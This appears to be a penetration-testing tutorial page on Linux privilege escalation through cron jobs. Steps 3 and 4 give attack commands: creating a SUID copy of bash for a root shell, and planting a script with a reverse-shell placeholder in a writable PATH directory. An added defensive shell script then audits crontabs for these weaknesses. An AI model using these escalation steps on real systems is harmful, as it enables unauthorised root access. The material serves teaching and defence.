# Cron Jobs

### Overview

Cron jobs are scheduled tasks defined in:

* User crontabs
* System-wide cron files
* Periodic cron directories

Many cron jobs:

* Run as **root**
* Execute scripts or binaries
* Assume files won’t be modified by low-priv users

If a low-privileged user can **modify what a cron job executes**, privilege escalation is possible.

### Why this Works

This technique works because:

* Cron jobs run **automatically and repeatedly**
* Jobs often execute as **root**
* Scripts and binaries are **trusted implicitly**
* Cron does not validate file ownership or integrity

If an attacker can:

* Modify a script
* Control a writable directory
* Abuse PATH resolution

Cron will execute attacker-controlled code as root.

### Prerequisites

For cron-based PrivEsc to be possible:

* Local access as a **non-root user**
* A cron job that:
  * Runs as root, and
  * Executes a writable script or binary
* OR a cron job that uses:
  * Relative paths
  * Insecure PATH variables

### Steps

1. List cron entries and check for any vulnerable entries.

   ```bash
   ls -la /etc/cron*
   cat /etc/crontab
   ```
2. Check if the cron job has insecure file permissions or is using a relative path.

   ```bash
   * * * * * root /usr/local/bin/backup.sh # backup.sh is writable
   * * * * * root backup.sh # backup.sh file is not absolute
   ```
3. If the script is **writable**, you can append malicious code. For example:

   ```bash
   cp /bin/bash /tmp/rootbash
   chmod +s /tmp/rootbash
   ```

   Save and wait for cron to execute. Once executed, you can gain a root shell using `/tmp/rootbash -p`.

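4. If the cron job uses a relative path, cron looks the command up through its own `PATH` (the one set in the crontab). When that `PATH` includes a directory we can write to, we can create a new file there and cron may execute it instead.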

   ```bash
   echo -e '#!/bin/bash\n<REV_SHELL_HERE>' > backup.sh
   chmod +x backup.sh
   export PATH=/tmp:$PATH
   ```
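
The two conditions from steps 2 to 4 can also be checked from the defensive side. This added example (not part of the original page) audits a system-style crontab for root jobs whose script or script directory is group- or world-writable, and for bare command names resolved through a crontab `PATH` with a writable directory ahead of the real file. The function names and the scratch crontab are constructed for illustration, and only the first word of each command is inspected.

```shell
#!/bin/sh
# Added example: audit a system-style crontab (min hour dom mon dow user command)
# for root jobs a non-root user could hijack. Checks mode bits only, not owner/ACLs.

# True if the path exists and has the group- or world-write bit set.
loose() { [ -n "$(find "$1" -prune \( -perm -0020 -o -perm -0002 \) 2>/dev/null)" ]; }

audit_crontab() (
    set -f                               # job lines contain '*': disable globbing
    cron_path=/usr/bin:/bin              # default for Vixie-style cron if no PATH line
    while read -r line; do
        case $line in
            PATH=*)   cron_path=${line#PATH=}; continue ;;
            [0-9*@]*) ;;                 # a job line
            *)        continue ;;        # comment, blank line, other variable
        esac
        set -- $line
        case $1 in @*) user=$2 cmd=$3 ;; *) user=$6 cmd=$7 ;; esac
        [ "$user" = root ] || continue
        case $cmd in
            /*) if loose "$cmd"; then echo "WRITABLE_SCRIPT $cmd"; fi
                if loose "${cmd%/*}"; then echo "WRITABLE_DIR ${cmd%/*}"; fi ;;
            *)  echo "RELATIVE_COMMAND $cmd"
                old_ifs=$IFS; IFS=:
                for dir in $cron_path; do
                    if loose "$dir"; then echo "WRITABLE_PATH_DIR $dir"; fi
                    if [ -e "$dir/$cmd" ]; then break; fi   # PATH lookup stops here
                done
                IFS=$old_ifs ;;
        esac
    done < "$1"
)

# Constructed sample: a scratch tree standing in for /etc/crontab and its targets.
make_sample() {
    t=$(mktemp -d) && mkdir "$t/bin" "$t/drop"
    : > "$t/bin/backup.sh"; : > "$t/bin/rotate.sh"
    chmod 755 "$t/bin" "$t/bin/rotate.sh"; chmod 777 "$t/drop" "$t/bin/backup.sh"
    printf '%s\n' "PATH=$t/drop:$t/bin" \
        "* * * * * root $t/bin/backup.sh" \
        "0 3 * * * root $t/bin/rotate.sh" \
        "* * * * * root backup.sh" \
        "* * * * * www-data backup.sh" > "$t/crontab"
    echo "$t"
}

sample=$(make_sample)
audit_crontab "$sample/crontab"          # on a real host: audit_crontab /etc/crontab
rm -rf "$sample"
```

Any `WRITABLE_*` line is fixed by tightening the mode (and ownership) of the named file or directory; a `RELATIVE_COMMAND` line is fixed by giving the job an absolute path.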

